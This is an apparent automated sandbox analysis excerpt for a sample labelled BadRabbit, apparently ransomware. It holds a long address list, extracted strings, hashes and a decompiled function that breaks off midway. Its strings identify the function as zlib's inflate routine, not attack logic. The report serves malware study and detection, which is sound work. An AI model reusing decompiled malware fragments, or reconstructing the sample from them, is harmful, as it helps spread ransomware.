0x013218db
0x013218e1
0x013218e4
0x013218e4
0x013218e7
0x013218e9
0x00000000
0x013218e9
0x01321892
0x01321892
0x00000000
0x01321892
0x01321890
0x01321813
0x01321813
0x01321819
0x00000000
0x0132181b
0x0132181b
0x01321825
0x01321828
0x0132182a
0x0132182b
0x01321834
0x0132183b
0x01321840
0x01321842
0x01321845
0x01321848
0x0132184b
0x00000000
0x0132184b
0x013217dd
0x013217dd
0x013217dd
0x013217e0
0x013217e0
0x013217e0
0x013217e2
0x00000000
0x00000000
0x013217e8
0x013217ec
0x013217f1
0x013217f3
0x013217f6
0x013217f9
0x013217fb
0x013217fe
0x013217ff
0x01321802
0x01321805
0x01321808
0x0132180b
0x00000000
0x00000000
0x00000000
0x0132180b
0x00000000
0x013217e0
0x013217cb
0x013217cb
0x00000000
0x013217cb
0x00000000
0x0132190d
0x0132190d
0x0132190f
0x01321910
0x01321912
0x01321944
0x01321944
0x01321947
0x0132194a
0x0132195e
0x0132195e
0x01321964
0x0132196f
0x0132196f
0x01321972
0x01321974
0x01321978
0x0132197b
0x0132197b
0x0132197e
0x0132197e
0x01321980
0x01321987
0x01321989
0x0132198c
0x01321991
0x01321995
0x013219a0
0x013219a0
0x013219a3
0x013219a6
0x013219a6
0x013219a8
0x013219aa
0x013219b0
0x013219b3
0x00000000
0x013219b3
0x01321966
0x01321966
0x0132194c
0x0132194c
0x0132194c
0x00000000
0x01321914
0x01321914
0x01321914
0x01321917
0x01321917
0x01321917
0x01321919
0x00000000
0x00000000
0x0132191f
0x0132191f
0x01321923
0x01321926
0x01321928
0x0132192a
0x0132192d
0x01321930
0x01321932
0x01321932
0x01321935
0x01321936
0x01321939
0x0132193c
0x0132193f
0x01321942
0x00000000
0x00000000
0x00000000
0x01321942
0x00000000
0x01321917
0x00000000
0x013219b5
0x013219b5
0x013219b8
0x013219e7
0x013219e7
0x013219ea
0x013219ec
0x013219ee
0x013219ee
0x013219f1
0x013219f8
0x013219fa
0x013219fc
0x013219ff
0x01321a02
0x01321a07
0x01321a0a
0x01321a0d
0x01321a12
0x01321a16
0x01321a21
0x01321a21
0x01321a24
0x01321a27
0x01321a27
0x01321a29
0x01321a2b
0x01321a31
0x01321a34
0x00000000
0x01321a34
0x013219ba
0x013219ba
0x013219ba
0x013219bd
0x013219bd
0x013219bd
0x013219bf
0x00000000
0x00000000
0x013219c5
0x013219c5
0x013219c9
0x013219cc
0x013219ce
0x013219d0
0x013219d3
0x013219d6
0x013219d8
0x013219d8
0x013219db
0x013219dc
0x013219df
0x013219e2
0x013219e5
0x00000000
0x00000000
0x00000000
0x013219e5
0x00000000
0x00000000
0x01321a36
0x01321a36
0x01321a38
0x01321a39
0x01321a3b
0x01321a6a
0x01321a6a
0x01321a6d
0x01321a6f
0x01321a71
0x01321a74
0x01321a77
0x01321a79
0x01321a7c
0x01321a7c
0x01321a7f
0x01321a7f
0x01321a82
0x01321a89
0x01321a8b
0x01321a8e
0x01321a93
0x01321a97
0x01321aa2
0x01321aa2
0x01321aa5
0x01321aa8
0x01321aa8
0x01321aaa
0x01321aac
0x01321ab2
0x01321ab4
0x01321ab7
0x00000000
0x01321ab7
0x01321a3d
0x01321a3d
0x01321a3d
0x01321a40
0x01321a40
0x01321a40
0x01321a42
0x00000000
0x00000000
0x01321a48
0x01321a48
0x01321a4c
0x01321a4f
0x01321a51
0x01321a53
0x01321a56
0x01321a59
0x01321a5b
0x01321a5b
0x01321a5e
0x01321a5f
0x01321a62
0x01321a65
0x01321a68
0x00000000
0x00000000
0x00000000
0x01321a68
0x00000000
0x00000000
0x01321aba
0x01321aba
0x01321ac1
0x01321b33
0x01321b33
0x01321b36
0x01321b38
0x01321b3a
0x01321b3a
0x01321b3a
0x01321b3a
0x01321b3e
0x01321b3e
0x00000000
0x01321b3e
0x01321ac3
0x01321ac3
0x01321ac5
0x01321ac6
0x01321ac8
0x01321af7
0x01321af7
0x01321afa
0x01321afd
0x01321aff
0x01321b01
0x01321b01
0x01321b04
0x01321b0b
0x01321b0d
0x01321b10
0x01321b15
0x01321b19
0x01321b24
0x01321b24
0x01321b27
0x01321b29
0x01321b2b
0x01321b2e
0x00000000
0x01321b2e
0x01321aca
0x01321aca
0x01321aca
0x01321acd
0x01321acd
0x01321acd
0x01321acf
0x00000000
0x00000000
0x01321ad5
0x01321ad5
0x01321ad9
0x01321adc
0x01321ade
0x01321ae0
0x01321ae3
0x01321ae6
0x01321ae8
0x01321ae8
0x01321aeb
0x01321aec
0x01321aef
0x01321af2
0x01321af5
0x00000000
0x00000000
0x00000000
0x01321af5
0x00000000
0x00000000
0x01321b44
0x01321b44
0x01321b4b
0x01321bd4
0x01321bd4
0x01321bd4
0x01321bd6
0x01321bd6
0x01321bd9
0x01321bdc
0x00000000
0x01321bdc
0x01321b51
0x01321b51
0x01321b54
0x01321b57
0x01321b59
0x01321b5c
0x01321b5f
0x01321b61
0x01321b63
0x01321b66
0x01321b68
0x01321b6a
0x01321b6d
0x01321b70
0x01321b72
0x01321b74
0x01321b77
0x01321b7a
0x01321b7d
0x01321b82
0x01321b84
0x01321b87
0x01321b8d
0x01321b89
0x01321b89
0x01321b89
0x01321b8f
0x01321b8f
0x01321b92
0x01321b92
0x01321b98
0x01321b9d
0x01321ba0
0x01321ba0
0x01321b72
0x01321ba3
0x01321baa
0x01321bad
0x01321bb8
0x01321bb8
0x01321bbb
0x01321bbe
0x01321bc1
0x01321bc4
0x01321bc4
0x01321bc4
0x01321bc4
0x01321bc7
0x01321bc9
0x01321bcc
0x00000000
0x01321bd2
0x01321bd2
0x00000000
0x01321bd2
0x00000000
0x01321be4
0x01321be4
0x01321be4
0x01321be6
0x01321be6
0x01321bed
0x01321c73
0x01321c73
0x01321c76
0x01321c78
0x01321c7a
0x01321c7a
0x01321c7d
0x01321c7d
0x01321c7f
0x01321c85
0x00000000
0x01321c85
0x01321bf3
0x01321bf3
0x01321bf5
0x00000000
0x00000000
0x01321bfb
0x01321bfb
0x01321bfe
0x01321c00
0x01321c00
0x01321c03
0x01321c03
0x01321c03
0x01321c07
0x01321c08
0x01321c0b
0x01321c0e
0x01321c11
0x01321c13
0x01321c15
0x01321c18
0x01321c1a
0x01321c1c
0x01321c1f
0x01321c22
0x01321c24
0x01321c27
0x01321c2a
0x01321c2d
0x01321c2d
0x01321c2d
0x01321c30
0x01321c30
0x01321c22
0x01321c33
0x01321c33
0x01321c33
0x01321c36
0x01321c3a
0x00000000
0x00000000
0x01321c3c
0x01321c3c
0x01321c3e
0x00000000
0x00000000
0x00000000
0x01321c3e
0x01321c40
0x01321c40
0x01321c47
0x01321c47
0x01321c4a
0x01321c56
0x01321c59
0x01321c59
0x01321c5c
0x01321c5f
0x01321c62
0x01321c64
0x01321c68
0x01321c6b
0x00000000
0x01321c71
0x01321c71
0x00000000
0x01321c71
0x00000000
0x01321c8a
0x01321c8a
0x01321c8a
0x01321c8c
0x01321c8c
0x01321c93
0x01321d19
0x01321d19
0x01321d1c
0x01321d1e
0x01321d20
0x01321d20
0x01321d23
0x01321d23
0x01321d26
0x00000000
0x01321d26
0x01321c99
0x01321c99
0x01321c9b
0x00000000
0x00000000
0x01321ca1
0x01321ca1
0x01321ca4
0x01321ca6
0x01321ca6
0x01321ca9
0x01321ca9
0x01321ca9
0x01321cad
0x01321cae
0x01321cb1
0x01321cb4
0x01321cb7
0x01321cb9
0x01321cbb
0x01321cbe
0x01321cc0
0x01321cc2
0x01321cc5
0x01321cc8
0x01321cca
0x01321ccd
0x01321cd0
0x01321cd3
0x01321cd3
0x01321cd3
0x01321cd6
0x01321cd6
0x01321cc8
0x01321cd9
0x01321cd9
0x01321cd9
0x01321cdc
0x01321ce0
0x00000000
0x00000000
0x01321ce2
0x01321ce2
0x01321ce4
0x00000000
0x00000000
0x00000000
0x01321ce4
0x01321ce6
0x01321ce6
0x01321ced
0x01321ced
0x01321cf0
0x01321cfc
0x01321cff
0x01321cff
0x01321d02
0x01321d05
0x01321d08
0x01321d0a
0x01321d0e
0x01321d11
0x00000000
0x01321d17
0x01321d17
0x00000000
0x01321d17
0x00000000
0x01321d2c
0x01321d2c
0x01321d33
0x01321d8c
0x01321d8c
0x01321d8c
0x01321d8e
0x01321d8e
0x01321d91
0x01321d93
0x01321d98
0x01321d9b
0x01321d9b
0x01321d9e
0x01321da1
0x01321da4
0x01321da4
0x01321dae
0x01321db3
0x01321db6
0x01321db9
0x00000000
0x01321db9
0x01321d35
0x01321d35
0x01321d37
0x01321d38
0x01321d3a
0x01321d6c
0x01321d6c
0x01321d70
0x01321d72
0x01321d80
0x01321d80
0x01321d82
0x01321d84
0x01321d87
0x00000000
0x01321d87
0x01321d74
0x01321d74
0x00000000
0x01321d74
0x01321d3c
0x01321d3c
0x01321d3c
0x01321d3f
0x01321d3f
0x01321d3f
0x01321d41
0x00000000
0x00000000
0x01321d47
0x01321d47
0x01321d4b
0x01321d4e
0x01321d50
0x01321d52
0x01321d55
0x01321d58
0x01321d5a
0x01321d5a
0x01321d5d
0x01321d5e
0x01321d61
0x01321d64
0x01321d67
0x01321d6a
0x00000000
0x00000000
0x00000000
0x01321d6a
0x00000000
0x00000000
0x01321ddc
0x01321ddc
0x01321ddf
0x01321e0e
0x01321e0e
0x01321e10
0x01321e15
0x01321e19
0x01321e1c
0x01321e20
0x01321e23
0x01321e25
0x01321e28
0x01321e2a
0x01321e2d
0x01321e30
0x01321e32
0x01321e35
0x01321e38
0x01321e3a
0x01321e3c
0x01321e42
0x01321e45
0x00000000
0x01321e45
0x01321de1
0x01321de1
0x01321de4
0x01321de4
0x01321de4
0x01321de6
0x00000000
0x00000000
0x01321dec
0x01321dec
0x01321df0
0x01321df3
0x01321df5
0x01321df7
0x01321dfa
0x01321dfd
0x01321dff
0x01321e02
0x01321e03
0x01321e06
0x01321e09
0x01321e0c
0x00000000
0x00000000
0x00000000
0x01321e0c
0x00000000
0x00000000
0x01321e49
0x01321e49
0x01321e49
0x01321e4b
0x01321e4b
0x01321e4e
0x01322a18
0x01322a18
0x01322a1b
0x01322a1e
0x01322a21
0x01322a24
0x01322a27
0x01322a29
0x01322a2c
0x01322a2f
0x01322a32
0x00000000
0x01322a32
0x01321e54
0x01321e57
0x01321e5c
0x01321e5f
0x01321e62
0x01321e65
0x01321e68
0x00000000
0x00000000
0x01321e6e
0x01321e6e
0x01321e72
0x00000000
0x00000000
0x01321e78
0x01321e78
0x01321e7c
0x00000000
0x00000000
0x00000000
0x00000000
0x01321e82
0x01321e82
0x01321e86
0x01321ea2
0x01321ea2
0x01321ea5
0x01321ed4
0x01321ed4
0x01321ed6
0x01321edb
0x01321ee0
0x01321ee3
0x01321ee3
0x01321ee6
0x01321f2a
0x01321f2a
0x01321f30
0x01321f30
0x01321f33
0x013218eb
0x013218eb
0x013218ee
0x00000000
0x013218ee
0x01321ee8
0x01321ee8
0x01321ee8
0x01321ee9
0x01321f07
0x01321f08
0x01321f10
0x01321f16
0x01321f1a
0x00000000
0x00000000
0x01321f1c
0x01321f1c
0x01321f1f
0x01321f22
0x00000000
0x01321f22
0x01321eeb
0x01321eeb
0x01321eeb
0x01321eec
0x01321f00
0x01321f02
0x01321f03
0x01321eee
0x01321eee
0x01321eee
0x01321eef
0x01321ef1
0x01321ef8
0x01321ef8
0x01321eef
0x00000000
0x01321eec
0x01321ea7
0x01321ea7
0x01321eaa
0x01321eaa
0x01321eaa
0x01321eac
0x00000000
0x00000000
0x01321eb2
0x01321eb2
0x01321eb6
0x01321eb9
0x01321ebb
0x01321ebd
0x01321ec0
0x01321ec3
0x01321ec5
0x01321ec8
0x01321ec9
0x01321ecc
0x01321ecf
0x01321ed2
0x00000000
0x00000000
0x00000000
0x01321ed2
0x00000000
0x01321eaa
0x01321e88
0x01321e88
0x01321e8a
0x01321e90
0x01321e93
0x01321e95
0x01321e97
0x01321e9a
0x00000000
0x00000000
0x01321f3b
0x01321f3d
0x01321f40
0x01321f42
0x01321f44
0x01321f47
0x01321f4a
0x01321f4d
0x01321f7f
0x01321f7f
0x01321f81
0x01321f83
0x01321f85
0x01321f8b
0x01321f8e
0x01321f90
0x01321f9e
0x01321f9e
0x01321fa0
0x01321fa3
0x01321fa7
0x01321fa9
0x01321fac
0x01321fae
0x01321fb1
0x01321fb4
0x01321fba
0x00000000
0x00000000
0x00000000
0x01321fba
0x01321f92
0x01321f92
0x00000000
0x01321f92
0x01321f4f
0x01321f4f
0x01321f52
0x01321f52
0x01321f52
0x01321f55
0x01321f57
0x00000000
0x00000000
0x01321f5d
0x01321f5d
0x01321f61
0x01321f64
0x01321f66
0x01321f68
0x01321f6b
0x01321f6d
0x01321f70
0x01321f73
0x01321f74
0x01321f77
0x01321f7a
0x01321f7d
0x00000000
0x00000000
0x00000000
0x01321f7d
0x00000000
0x00000000
0x01321fc0
0x01321fc0
0x00000000
0x00000000
0x01321fc6
0x01321fc6
0x01321fc9
0x01321fcb
0x01322012
0x01322012
0x00000000
0x01322012
0x01321fcd
0x01321fcd
0x01321fcf
0x01321fd2
0x01321fd5
0x01321fd9
0x01321fdc
0x01321fde
0x00000000
0x00000000
0x01321fe4
0x01321feb
0x01321ff0
0x01321ff3
0x01321ff6
0x01321ff9
0x01321ffc
0x01321ffe
0x01322001
0x01322004
0x01322007
0x0132200a
0x00000000
0x00000000
0x00000000
0x00000000
0x01322101
0x01322101
0x01322104
0x01322107
0x00000000
0x00000000
0x013220a8
0x013220a8
0x013220ab
0x013220da
0x013220df
0x013220e2
0x013220e5
0x013220f0
0x013220f5
0x013220f8
0x013220f8
0x013220fb
0x013220fe
0x00000000
0x013220fe
0x013220ad
0x013220ad
0x013220b0
0x013220b0
0x013220b0
0x013220b2
0x00000000
0x00000000
0x013220b8
0x013220bc
0x013220c1
0x013220c3
0x013220c6
0x013220c9
0x013220ce
0x013220cf
0x013220d2
0x013220d5
0x013220d8
0x00000000
0x00000000
0x00000000
0x013220d8
0x00000000
0x013220b0
0x01322109
0x01322120
0x01322120
0x01322120
0x01322124
0x00000000
0x00000000
0x0132210b
0x01322118
0x0132211d
0x0132211d
0x0132211d
0x0132211d
0x01322126
0x01322126
0x0132212f
0x01322132
0x0132213d
0x0132214e
0x01322153
0x01322156
0x01322159
0x0132215b
0x0132216f
0x0132216f
0x01322173
0x00000000
0x01322173
0x0132215d
0x0132215d
0x00000000
0x00000000
0x0132232f
0x0132232f
0x01322335
0x01322338
0x0132233b
0x0132233d
0x00000000
0x00000000
0x00000000
0x00000000
0x013221a1
0x013221a1
0x013221b0
0x013221bb
0x013221be
0x013221c0
0x00000000
0x00000000
0x0132217e
0x0132217e
0x01322181
0x01322183
0x00000000
0x00000000
0x01322189
0x01322189
0x0132218d
0x01322197
0x0132219b
0x0132219e
0x0132219e
0x0132219e
0x013221c2
0x013221c4
0x013221c6
0x013221c9
0x013221ca
0x013221cd
0x013221ed
0x013221ed
0x0132225e
0x0132225e
0x01322261
0x01322263
0x01322264
0x01322268
0x0132226b
0x013222b5
0x013222b5
0x013222b8
0x013222b8
0x013222b8
0x013222bb
0x013222bd
0x00000000
0x00000000
0x013222bf
0x013222bf
0x013222c2
0x013222c4
0x00000000
0x00000000
0x013222ca
0x013222ce
0x013222d8
0x013222db
0x013222dd
0x013222e0
0x013222e3
0x013222e3
0x013222e8
0x013222e8
0x013222ec
0x013222f2
0x013222f4
0x013222f5
0x013222f8
0x013222f8
0x013222fb
0x013222fb
0x013222ff
0x013222ff
0x01322301
0x01322307
0x0132230d
0x01322310
0x01322313
0x01322315
0x01322351
0x01322351
0x01322358
0x0132235e
0x0132235e
0x01322361
0x01321dbf
0x01321dbf
0x00000000
0x01321dbf
0x01322367
0x01322369
0x01322370
0x0132237e
0x0132237e
0x01322387
0x0132238a
0x01322395
0x013223a7
0x013223ac
0x013223af
0x013223b2
0x013223b4
0x013223c2
0x013223ca
0x013223df
0x013223eb
0x013223f0
0x013223f3
0x013223f6
0x013223f8
0x01322406
0x01322406
0x0132240a
0x0132240d
0x01322413
0x00000000
0x00000000
0x01322419
0x01322419
0x00000000
0x01322419
0x013223fa
0x013223fa
0x01322164
0x01322164
0x00000000
0x01322164
0x013223b6
0x013223b6
0x00000000
0x013223b6
0x01322372
0x01322372
0x00000000
0x01322372
0x01322317
0x01322317
0x0132231a
0x0132231c
0x00000000
0x00000000
0x0132231e
0x0132231e
0x01322321
0x01322321
0x01322324
0x01322329
0x0132232c
0x0132232c
0x0132232c
0x00000000
0x01322321
0x0132226d
0x0132226d
0x01322270
0x01322270
0x01322270
0x01322273
0x01322275
0x00000000
0x00000000
0x01322277
0x01322277
0x0132227a
0x0132227c
0x00000000
0x00000000
0x01322282
0x01322286
0x01322290
0x01322293
0x01322295
0x01322298
0x0132229b
0x0132229b
0x013222a0
0x013222a0
0x013222a4
0x013222aa
0x013222ac
0x013222ad
0x013222b0
0x00000000
0x013222b0
0x013221ef
0x013221f7
0x013221fa
0x013221fd
0x013221ff
0x01322228
0x0132222b
0x0132222e
0x01322231
0x01322233
0x01322235
0x01322238
0x0132223b
0x0132223d
0x01322345
0x01322345
0x00000000
0x01322345
0x01322243
0x0132224d
0x01322250
0x01322253
0x01322256
0x00000000
0x00000000
0x00000000
0x00000000
0x01322201
0x01322201
0x01322201
0x01322204
0x01322206
0x00000000
0x00000000
0x0132220c
0x0132220d
0x01322218
0x0132221a
0x0132221d
0x01322220
0x01322223
0x01322226
0x00000000
0x00000000
0x00000000
0x01322226
0x00000000
0x01322201
0x013221cf
0x013221d2
0x013221d8
0x013221da
0x013221dd
0x013221e0
0x013221e5
0x013221e5
0x01322343
0x00000000
0x00000000
0x0132241c
0x0132241c
0x00000000
0x00000000
0x01322422
0x01322422
0x01322425
0x0132248e
0x01322494
0x0132249b
0x013224a9
0x013224ea
0x013224ea
0x013224f2
0x013224f4
0x00000000
0x00000000
0x013224ae
0x013224ae
0x013224b1
0x013224b3
0x00000000
0x00000000
0x013224b9
0x013224bd
0x013224c0
0x013224c2
0x013224c5
0x013224d2
0x013224d8
0x013224e1
0x013224e4
0x013224e7
0x013224e7
0x013224f6
0x013224f6
0x013224f8
0x013225b2
0x013225b7
0x013225ba
0x013225c0
0x013225c2
0x013225c9
0x013225cc
0x013225cf
0x013225d2
0x013225d4
0x013225e1
0x013225e1
0x013225e3
0x013225f7
0x013225f7
0x013225fa
0x013225fc
0x0132260a
0x0132260d
0x0132260d
0x01322610
0x01322616
0x00000000
0x01322616
0x013225fe
0x013225fe
0x00000000
0x013225fe
0x013225e5
0x013225e5
0x013225ec
0x00000000
0x013225ec
0x013225d6
0x013225d6
0x00000000
0x013225d6
0x013224fe
0x013224fe
0x01322500
0x00000000
0x00000000
0x01322506
0x0132250e
0x01322511
0x01322520
0x0132252d
0x01322532
0x0132253e
0x01322543
0x01322545
0x0132259f
0x0132259f
0x013225a2
0x013225a8
0x013225aa
0x013225aa
0x013225ac
0x00000000
0x00000000
0x00000000
0x00000000
0x01322547
0x01322547
0x01322547
0x0132254a
0x0132254c
0x00000000
0x00000000
0x01322552
0x01322555
0x0132255b
0x0132255e
0x01322561
0x01322569
0x01322571
0x0132258b
0x01322598
0x0132259b
0x0132259d
0x00000000
0x00000000
0x00000000
0x0132259d
0x00000000
0x01322547
0x01322427
0x01322427
0x0132242a
0x0132242f
0x00000000
0x00000000
0x01322431
0x01322434
0x01322437
0x0132243a
0x0132243d
0x01322443
0x01322445
0x01322448
0x01322449
0x0132244c
0x0132244f
0x01322454
0x0132245a
0x0132245d
0x01322461
0x01322468
0x0132246b
0x01322470
0x01322473
0x01322476
0x01322479
0x0132247c
0x01322482
0x01322482
0x00000000
0x00000000
0x01322619
0x01322619
0x0132261c
0x0132261e
0x0132266d
0x01322670
0x01322676
0x00000000
0x01322676
0x01322620
0x01322620
0x01322622
0x01322650
0x01322652
0x01322655
0x0132265a
0x0132265d
0x0132265f
0x01322661
0x01322664
0x01322664
0x01322664
0x0132266a
0x00000000
0x0132266a
0x01322624
0x01322624
0x01322627
0x01322627
0x01322627
0x01322629
0x00000000
0x00000000
0x0132262f
0x01322633
0x01322638
0x0132263a
0x0132263d
0x01322640
0x01322645
0x01322646
0x01322649
0x0132264c
0x0132264e
0x00000000
0x00000000
0x00000000
0x0132264e
0x00000000
0x00000000
0x0132267c
0x01322681
0x01322688
0x0132268d
0x01322698
0x0132269a
0x013226e4
0x013226e4
0x013226e6
0x01322795
0x01322795
0x0132279d
0x013227a0
0x013227a6
0x013227a8
0x013227aa
0x013227ad
0x013227b0
0x013227b2
0x013227c0
0x013227c2
0x013227ce
0x013227ce
0x013227d1
0x013227d4
0x00000000
0x013227d4
0x013227b4
0x013227b4
0x00000000
0x013227b4
0x013226ec
0x013226f4
0x013226f7
0x01322706
0x01322713
0x01322718
0x01322724
0x01322729
0x0132272b
0x01322785
0x01322785
0x0132278b
0x0132278d
0x0132278f
0x0132278f
0x0132278f
0x00000000
0x00000000
0x00000000
0x00000000
0x0132272d
0x0132272d
0x0132272d
0x01322730
0x01322732
0x00000000
0x00000000
0x01322738
0x0132273b
0x01322741
0x01322744
0x01322747
0x0132274f
0x01322757
0x01322771
0x0132277e
0x01322781
0x01322783
0x00000000
0x00000000
0x00000000
0x01322783
0x00000000
0x0132272d
0x0132269c
0x0132269c
0x0132269f
0x0132269f
0x0132269f
0x013226a1
0x00000000
0x00000000
0x013226a7
0x013226aa
0x013226ac
0x013226ad
0x013226b0
0x013226b3
0x013226c0
0x013226c6
0x013226d2
0x013226d7
0x013226e0
0x013226e2
0x00000000
0x00000000
0x00000000
0x013226e2
0x00000000
0x00000000
0x013227d7
0x013227d7
0x013227da
0x013227dc
0x0132282c
0x0132282c
0x00000000
0x0132282c
0x013227de
0x013227de
0x013227e0
0x01322811
0x01322813
0x01322816
0x0132281c
0x0132281e
0x01322820
0x01322823
0x01322823
0x01322823
0x01322829
0x00000000
0x01322829
0x013227e2
0x013227e2
0x013227e5
0x013227e5
0x013227e5
0x013227e8
0x013227ea
0x00000000
0x00000000
0x013227f0
0x013227f4
0x013227f9
0x013227fb
0x013227fe
0x01322801
0x01322806
0x01322807
0x0132280a
0x0132280d
0x0132280f
0x00000000
0x00000000
0x00000000
0x0132280f
0x00000000
0x00000000
0x01322832
0x01322832
0x01322835
0x01322837
0x00000000
0x00000000
0x0132283d
0x01322840
0x01322842
0x01322845
0x01322847
0x01322888
0x0132288b
0x0132288b
0x0132288d
0x01322890
0x01322893
0x01322893
0x01322895
0x01322895
0x01322898
0x0132289a
0x013228a1
0x013228a7
0x013228aa
0x013228ad
0x013228ad
0x013228af
0x013228af
0x013228b2
0x013228b4
0x013228b5
0x013228b5
0x013228b5
0x013228b8
0x013228bb
0x013228be
0x013228c1
0x013228c4
0x013228ca
0x013228ca
0x00000000
0x013228c4
0x01322849
0x01322849
0x0132284b
0x0132284e
0x01322865
0x01322865
0x01322868
0x0132286b
0x01322879
0x01322879
0x0132286d
0x0132286d
0x01322873
0x01322873
0x0132287c
0x0132287f
0x01322882
0x01322884
0x00000000
0x01322886
0x01322886
0x00000000
0x01322886
0x01322884
0x01322850
0x01322850
0x01322857
0x00000000
0x00000000
0x01322859
0x01322859
0x00000000
0x00000000
0x013228d5
0x013228d5
0x013228d9
0x00000000
0x00000000
0x013228df
0x013228df
0x013228e2
0x013228e5
0x013228e8
0x013228eb
0x013228ed
0x013228f0
0x00000000
0x00000000
0x013228fb
0x013228fb
0x013228ff
0x01322900
0x00000000
0x013229c8
0x013229c8
0x013229ca
0x013229cd
0x01322a3e
0x01322a3e
0x00000000
0x01322a3e
0x013229cf
0x013229cf
0x013229d2
0x00000000
0x00000000
0x013229d4
0x013229d4
0x013229d7
0x01322a07
0x01322a07
0x01322a0a
0x01322a39
0x01322a39
0x01322a3c
0x00000000
0x01322a3c
0x01322a0c
0x01322a0c
0x01321899
0x01321899
0x01321dc2
0x01321dc2
0x00000000
0x01321dc2
0x013229d9
0x013229d9
0x013229dc
0x013229dc
0x013229dc
0x013229de
0x00000000
0x00000000
0x013229e0
0x013229e0
0x013229e4
0x013229e7
0x013229e9
0x013229eb
0x013229ee
0x013229f1
0x013229f3
0x013229f6
0x013229f7
0x013229fa
0x013229fd
0x01322a00
0x01322a03
0x00000000
0x00000000
0x01322a05
0x01322a05
0x01322a05
0x00000000
0x01322a05
0x00000000
0x00000000
0x01322a44
0x01322a44
0x01322a46
0x00000000
0x00000000
0x01322a49
0x01322a49
0x01322a4b
0x01322a4c
0x01322a4c
0x00000000
0x00000000
0x00000000
0x00000000
0x013217be
0x01321dd0
0x01321dd0
0x00000000
0x01321dd0
0x0132208b
0x0132208f
0x00000000
0x00000000
0x01322091
0x01322091
0x01322097
0x01322098
0x00000000
0x01322098

Strings

invalid code lengths set, xrefs: 0132215D
invalid distance code, xrefs: 013227B4
too many length or distance symbols, xrefs: 0132209C
invalid bit length repeat, xrefs: 01322345, 01322351
8 Oet, xrefs: 01322A52, 01322A9A
invalid literal/length code, xrefs: 013225FE
8 Oet, xrefs: 01322A5E
invalid distances set, xrefs: 013223FA
Oet, xrefs: 01321DC2, 01322A4F
invalid literal/lengths set, xrefs: 013223B6
invalid code -- missing end-of-block, xrefs: 01322372
invalid distance too far back, xrefs: 01322859

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID:
String ID: Oet$8 Oet$8 Oet$invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-3085564239
Opcode ID: ad925db56aeca51c25d9ebd8276e7b97742b47c1735a17cbbcc10330c4aa2cdc
Instruction ID: 304733c20f51d9dc9776b77dddbd18804b4fcd43b26aa5b9731a3301a27d9e07
Opcode Fuzzy Hash: ad925db56aeca51c25d9ebd8276e7b97742b47c1735a17cbbcc10330c4aa2cdc
Instruction Fuzzy Hash: 98627B71E00629DFDF18DF59C8906ADBBF2FF88314B1481AAD956AB785D7349A40CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0132173C Relevance: 14.2, APIs: 1, Strings: 8, Instructions: 675
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E0132173C(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				unsigned int _v40;
				int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v54;
				signed int _v56;
				signed int _v60;
				signed int _v2097152004;
				void* _t774;
				signed int _t776;
				signed int* _t815;
				signed int _t819;
				signed int _t834;
				signed int _t844;
				intOrPtr* _t847;
				intOrPtr _t849;

				_t1 =  &_a4; // 0x38
				_t847 =  *_t1;
				if(_t847 == 0) {
					L144:
					_push(0xfffffffe);
					L145:
					_pop(_t774);
					return _t774;
				}
				_t815 =  *(_t847 + 0x1c);
				_v40 = _t815;
				if(_t815 != 0 &&  *((intOrPtr*)(_t847 + 0xc)) != 0 && ( *_t847 != 0 ||  *(_t847 + 4) == 0)) {
					if( *_t815 == 0xb) {
						 *_t815 = 0xc;
					}
					_t834 = _t815[0xe];
					_t844 = _t815[0xf];
					_v32 =  *((intOrPtr*)(_t847 + 0xc));
					_v28 =  *((intOrPtr*)(_t847 + 0x10));
					_v12 =  *_t847;
					_t819 =  *(_t847 + 4);
					_v36 = 0;
					_t776 =  *_t815;
					_v8 = _t819;
					_v16 = _t834;
					_v20 = _t844;
					_v60 = _t819;
					_v44 = _v28;
					if(_t776 <= 0x1e) {
						_t21 =  &_a4; // 0x38
						_t849 =  *_t21;
						do {
							switch( *((intOrPtr*)(_t776 * 4 +  &M01322B54))) {
								case 0:
									if(_t815[2] != 0) {
										_push(0x10);
										_pop(_t777);
										__eflags = _t844 - _t777;
										if(_t844 >= _t777) {
											L16:
											__eflags = _t815[2] & 0x00000002;
											if((_t815[2] & 0x00000002) == 0) {
												L19:
												_t815[4] = _t815[4] & 0x00000000;
												_t778 = _t815[8];
												__eflags = _t778;
												if(_t778 != 0) {
													_t46 = _t778 + 0x30;
													 *_t46 =  *(_t778 + 0x30) | 0xffffffff;
													__eflags =  *_t46;
												}
												__eflags = _t815[2] & 0x00000001;
												if((_t815[2] & 0x00000001) == 0) {
													L32:
													 *(_t849 + 0x18) = "incorrect header check";
													goto L25;
												}
												_t781 = (_t834 >> 8) + ((_t834 & 0x000000ff) << 8);
												_push(0x1f);
												_pop(_t822);
												__eflags = _t781 % _t822;
												_t834 = _v16;
												if(_t781 % _t822 != 0) {
													goto L32;
												}
												__eflags = (_t834 & 0x0000000f) - 8;
												if((_t834 & 0x0000000f) == 8) {
													_t834 = _t834 >> 4;
													_t844 = _t844 - 4;
													_v16 = _t834;
													_v20 = _t844;
													_t825 = (_t834 & 0x0000000f) + 8;
													__eflags = _t815[9];
													if(_t815[9] != 0) {
														__eflags = _t825 - _t815[9];
														if(_t825 <= _t815[9]) {
															goto L28;
														}
														 *(_t849 + 0x18) = "invalid window size";
														goto L25;
													} else {
														_t815[9] = _t825;
														L28:
														_t844 = 0;
														_t815[5] = 1 << _t825;
														_t788 = E01322E91(0, 0, 0);
														_t815[6] = _t788;
														 *(_t849 + 0x30) = _t788;
